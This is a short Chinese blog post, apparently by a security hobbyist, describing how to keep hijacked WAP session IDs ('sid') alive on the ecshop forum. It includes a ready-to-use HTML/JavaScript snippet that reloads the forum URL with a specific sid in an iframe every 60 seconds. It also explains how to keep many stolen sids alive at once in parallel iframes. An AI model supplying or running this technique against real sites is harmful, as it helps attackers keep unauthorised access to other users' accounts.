再谈一下session保持,由于session总是会过期的,需要一直有人刷新才行。还记得cnqing写的那个session保持工具,其实攻击wap不需要保持真正的session,要的是sid。我们只要下面一段javascript代码,就可以一直保持这个sid了。原理还是wap验证使用的是sid,而不是session,所以只要1分钟内发一个get请求,带上sid就好。
DEMO:
- <script>
- //下面是要保持session的地址。
- var url=" http://bbs.ecshop.com/wap/index.php?sid=1oALS7";
- window.setInterval("keepsid()", 60000);
- function keepsid(){
- document.getElementById("iframe1").src=url+"&time="+Math.random();
- }
- </script>
- <iframe id="iframe1" src=""></iframe>
以上代码只要保存为htm文件用浏览器打开就好。你甚至可以一个页面上N多iframe,N多sid,同时保持着,它们可以是不同的sid。
0 条评论。